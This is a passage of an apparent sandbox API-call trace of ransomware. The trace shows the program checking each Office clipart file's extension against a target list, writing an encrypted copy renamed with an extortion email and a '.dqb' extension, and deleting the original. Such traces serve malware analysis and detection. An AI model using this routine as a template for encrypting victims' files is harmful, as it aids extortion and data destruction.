(lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00274_.wmf")) returned 1 [0055.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63 [0055.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63 [0055.500] lstrlenW (lpString=".doc") returned 4 [0055.500] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.500] lstrlenW (lpString=".docx") returned 5 [0055.500] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.500] lstrlenW (lpString=".pdf") returned 4 [0055.500] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.500] lstrlenW (lpString=".xls") returned 4 [0055.501] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.501] lstrlenW (lpString=".xlsx") returned 5 [0055.501] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.501] lstrlenW (lpString=".ppt") returned 4 [0055.501] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63 [0055.501] lstrlenW (lpString=".zip") returned 4 [0055.501] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.501] lstrlenW (lpString=".rar") returned 4 [0055.501] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.501] lstrlenW (lpString=".bz2") returned 4 [0055.501] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.501] lstrlenW (lpString=".7z") returned 3 [0055.501] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63 [0055.501] lstrlenW (lpString=".dbf") returned 4 [0055.501] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63 [0055.501] lstrlenW (lpString=".1cd") returned 4 [0055.501] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63 [0055.501] lstrlenW (lpString=".jpg") returned 4 [0055.501] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.501] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.502] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.502] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00296_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0055.502] GetLastError () returned 0x0 [0055.502] ReadFile (in: hFile=0x238, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x32c, lpOverlapped=0x0) returned 1 [0055.504] WriteFile (in: hFile=0x17c, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x330, lpOverlapped=0x0) returned 1 [0055.504] ReadFile (in: hFile=0x238, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0055.504] WriteFile (in: hFile=0x17c, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.505] SetEndOfFile (hFile=0x17c) returned 1 [0055.505] CloseHandle (hObject=0x17c) returned 1 [0055.505] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.505] SetEndOfFile (hFile=0x238) returned 1 [0055.506] CloseHandle (hObject=0x238) returned 1 [0055.506] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.506] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00296_.wmf")) returned 1 [0055.506] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63 [0055.506] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63 [0055.506] lstrlenW (lpString=".doc") returned 4 [0055.506] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.506] lstrlenW (lpString=".docx") returned 5 [0055.506] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.506] lstrlenW (lpString=".pdf") returned 4 [0055.506] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.507] lstrlenW (lpString=".xls") returned 4 [0055.507] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.507] lstrlenW (lpString=".xlsx") returned 5 [0055.507] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.507] lstrlenW (lpString=".ppt") returned 4 [0055.507] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63 [0055.507] lstrlenW (lpString=".zip") returned 4 [0055.507] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.507] lstrlenW (lpString=".rar") returned 4 [0055.507] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.507] lstrlenW (lpString=".bz2") returned 4 [0055.507] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.507] lstrlenW (lpString=".7z") returned 3 [0055.507] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63 [0055.507] lstrlenW (lpString=".dbf") returned 4 [0055.507] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63 [0055.507] lstrlenW (lpString=".1cd") returned 4 [0055.507] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63 [0055.507] lstrlenW (lpString=".jpg") returned 4 [0055.507] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.508] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.508] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.508] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00390_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0055.509] GetLastError () returned 0x0 [0055.509] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x332e, lpOverlapped=0x0) returned 1 [0055.510] WriteFile (in: hFile=0x178, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x3330, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x3330, lpOverlapped=0x0) returned 1 [0055.511] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0055.511] WriteFile (in: hFile=0x178, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.512] SetEndOfFile (hFile=0x178) returned 1 [0055.512] CloseHandle (hObject=0x178) returned 1 [0055.512] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.512] SetEndOfFile (hFile=0x17c) returned 1 [0055.513] CloseHandle (hObject=0x17c) returned 1 [0055.513] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.513] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00390_.wmf")) returned 1 [0055.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63 [0055.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63 [0055.513] lstrlenW (lpString=".doc") returned 4 [0055.513] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.514] lstrlenW (lpString=".docx") returned 5 [0055.514] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.514] lstrlenW (lpString=".pdf") returned 4 [0055.514] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.514] lstrlenW (lpString=".xls") returned 4 [0055.514] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.514] lstrlenW (lpString=".xlsx") returned 5 [0055.514] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.514] lstrlenW (lpString=".ppt") returned 4 [0055.514] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.514] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63 [0055.514] lstrlenW (lpString=".zip") returned 4 [0055.514] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.514] lstrlenW (lpString=".rar") returned 4 [0055.514] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.514] lstrlenW (lpString=".bz2") returned 4 [0055.514] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.514] lstrlenW (lpString=".7z") returned 3 [0055.514] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.514] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63 [0055.514] lstrlenW (lpString=".dbf") returned 4 [0055.514] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.514] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63 [0055.514] lstrlenW (lpString=".1cd") returned 4 [0055.514] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.514] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63 [0055.514] lstrlenW (lpString=".jpg") returned 4 [0055.514] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.515] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.515] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00392_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0055.515] GetLastError () returned 0x0 [0055.515] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x69aa, lpOverlapped=0x0) returned 1 [0055.517] WriteFile (in: hFile=0x178, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x69b0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x69b0, lpOverlapped=0x0) returned 1 [0055.518] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0055.518] WriteFile (in: hFile=0x178, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.518] SetEndOfFile (hFile=0x178) returned 1 [0055.519] CloseHandle (hObject=0x178) returned 1 [0055.519] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.519] SetEndOfFile (hFile=0x17c) returned 1 [0055.520] CloseHandle (hObject=0x17c) returned 1 [0055.520] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.520] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00392_.wmf")) returned 1 [0055.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63 [0055.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63 [0055.520] lstrlenW (lpString=".doc") returned 4 [0055.520] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.520] lstrlenW (lpString=".docx") returned 5 [0055.520] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.520] lstrlenW (lpString=".pdf") returned 4 [0055.520] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.521] lstrlenW (lpString=".xls") returned 4 [0055.521] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.521] lstrlenW (lpString=".xlsx") returned 5 [0055.521] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.521] lstrlenW (lpString=".ppt") returned 4 [0055.521] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63 [0055.521] lstrlenW (lpString=".zip") returned 4 [0055.521] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.521] lstrlenW (lpString=".rar") returned 4 [0055.521] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.521] lstrlenW (lpString=".bz2") returned 4 [0055.521] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.521] lstrlenW (lpString=".7z") returned 3 [0055.521] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63 [0055.521] lstrlenW (lpString=".dbf") returned 4 [0055.521] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63 [0055.521] lstrlenW (lpString=".1cd") returned 4 [0055.521] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63 [0055.521] lstrlenW (lpString=".jpg") returned 4 [0055.521] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.521] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.522] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.522] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00524_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0055.522] GetLastError () returned 0x0 [0055.522] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x1b54, lpOverlapped=0x0) returned 1 [0055.670] WriteFile (in: hFile=0x178, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x1b60, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x1b60, lpOverlapped=0x0) returned 1 [0055.672] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0055.672] WriteFile (in: hFile=0x178, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.672] SetEndOfFile (hFile=0x178) returned 1 [0055.672] CloseHandle (hObject=0x178) returned 1 [0055.672] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.672] SetEndOfFile (hFile=0x17c) returned 1 [0055.673] CloseHandle (hObject=0x17c) returned 1 [0055.673] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.673] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00524_.wmf")) returned 1 [0055.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63 [0055.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63 [0055.674] lstrlenW (lpString=".doc") returned 4 [0055.674] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.674] lstrlenW (lpString=".docx") returned 5 [0055.674] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.674] lstrlenW (lpString=".pdf") returned 4 [0055.674] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.674] lstrlenW (lpString=".xls") returned 4 [0055.674] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.674] lstrlenW (lpString=".xlsx") returned 5 [0055.674] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.674] lstrlenW (lpString=".ppt") returned 4 [0055.674] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63 [0055.676] lstrlenW (lpString=".zip") returned 4 [0055.676] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.677] lstrlenW (lpString=".rar") returned 4 [0055.677] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.677] lstrlenW (lpString=".bz2") returned 4 [0055.677] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.677] lstrlenW (lpString=".7z") returned 3 [0055.677] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.677] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63 [0055.677] lstrlenW (lpString=".dbf") returned 4 [0055.677] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.677] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63 [0055.677] lstrlenW (lpString=".1cd") returned 4 [0055.677] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.677] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63 [0055.677] lstrlenW (lpString=".jpg") returned 4 [0055.677] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.677] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.677] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.677] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00174_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0055.678] GetLastError () returned 0x0 [0055.678] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x20ae, lpOverlapped=0x0) returned 1 [0055.679] WriteFile (in: hFile=0x178, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x20b0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x20b0, lpOverlapped=0x0) returned 1 [0055.680] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0055.680] WriteFile (in: hFile=0x178, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.681] SetEndOfFile (hFile=0x178) returned 1 [0055.681] CloseHandle (hObject=0x178) returned 1 [0055.681] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.681] SetEndOfFile (hFile=0x17c) returned 1 [0055.682] CloseHandle (hObject=0x17c) returned 1 [0055.682] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.682] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00174_.wmf")) returned 1 [0055.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63 [0055.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63 [0055.682] lstrlenW (lpString=".doc") returned 4 [0055.682] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.682] lstrlenW (lpString=".docx") returned 5 [0055.682] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.682] lstrlenW (lpString=".pdf") returned 4 [0055.682] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.682] lstrlenW (lpString=".xls") returned 4 [0055.682] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.682] lstrlenW (lpString=".xlsx") returned 5 [0055.682] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.682] lstrlenW (lpString=".ppt") returned 4 [0055.682] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63 [0055.683] lstrlenW (lpString=".zip") returned 4 [0055.683] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.683] lstrlenW (lpString=".rar") returned 4 [0055.683] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.683] lstrlenW (lpString=".bz2") returned 4 [0055.683] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.683] lstrlenW (lpString=".7z") returned 3 [0055.683] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63 [0055.683] lstrlenW (lpString=".dbf") returned 4 [0055.683] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63 [0055.683] lstrlenW (lpString=".1cd") returned 4 [0055.683] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63 [0055.683] lstrlenW (lpString=".jpg") returned 4 